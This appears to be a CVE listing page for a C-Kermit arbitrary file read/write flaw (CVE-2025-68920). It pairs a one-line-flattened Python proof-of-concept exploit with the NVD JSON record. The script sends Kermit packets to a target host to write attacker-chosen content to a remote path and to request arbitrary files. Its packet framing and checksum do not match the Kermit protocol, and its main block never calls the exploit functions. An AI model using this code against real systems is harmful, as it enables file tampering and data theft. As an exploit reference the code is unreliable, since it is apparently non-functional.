CVE-2025-68920

#!/usr/bin/env python3 # CVE-2025-68920 PoC - C-Kermit Arbitrary File Read/Write # This PoC demonstrates the file transfer vulnerability in C-Kermit import socket import struct import sys def build_kermit_packet(data, seq=0, type_='D'): """Build a Kermit protocol packet""" # Kermit packet format: MARK, LEN, SEQ, TYPE, DATA, CHECK, TERMINATOR packet = struct.pack('!BBB', 0x01, len(data) + 2, seq) type_byte = ord(type_) if isinstance(type_, str) else type_ packet += struct.pack('!B', type_byte) packet += data.encode('latin-1') if isinstance(data, str) else data # Calculate checksum checksum = sum(packet) % 64 + 64 packet += struct.pack('!B', checksum) packet += struct.pack('!B', 0x0D) # CR terminator return packet def exploit_file_write(target_host, target_port, remote_path, malicious_content): """ Exploit C-Kermit to write arbitrary file on target system """ print(f"[*] Connecting to {target_host}:{target_port}") sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((target_host, target_port)) # Send malicious file transfer request # Type 'S' = Send init, Type 'F' = File header, Type 'D' = Data init_packet = build_kermit_packet('S', 0, 'S') sock.send(init_packet) # Send malicious filename (path traversal) file_packet = build_kermit_packet(f"{remote_path}", 1, 'F') sock.send(file_packet) # Send malicious file content data_packet = build_kermit_packet(malicious_content, 2, 'D') sock.send(data_packet) # Send end-of-file packet eof_packet = build_kermit_packet('', 3, 'Z') sock.send(eof_packet) print("[+] Malicious file transfer packet sent") sock.close() def exploit_file_read(target_host, target_port, target_file): """ Exploit C-Kermit to read arbitrary file from target system """ print(f"[*] Requesting file: {target_file}") sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((target_host, target_port)) # Request to receive specific file recv_request = build_kermit_packet(f"R {target_file}", 0, 'S') sock.send(recv_request) # Wait for response sock.settimeout(10) try: response = sock.recv(4096) print(f"[+] Received {len(response)} bytes") print("[*] File content potentially leaked") except socket.timeout: print("[-] No response received") sock.close() if __name__ == "__main__": print("CVE-2025-68920 PoC - C-Kermit File Read/Write") print("Usage: python3 cve-2025-68920.py <target_host> <port> <mode>") print("Modes: write <remote_path> <content> | read <file_path>")

{"cve": {"id": "CVE-2025-68920", "sourceIdentifier": "[email protected]", "published": "2025-12-24T22:15:43.550", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "C-Kermit (aka ckermit) through 10.0 Beta.12 (aka 416-beta12) before 244644d allows a remote Kermit system to overwrite files on the local system, or retrieve arbitrary files from the local system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L", "baseScore": 8.9, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.2, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1123025", "source": "[email protected]"}, {"url": "https://github.com/KermitProject/ckermit/pull/20", "source": "[email protected]"}, {"url": "https://www.complete.org/kermit/", "source": "[email protected]"}, {"url": "https://www.kermitproject.org/ftp/kermit/test/tar/", "source": "[email protected]"}]}}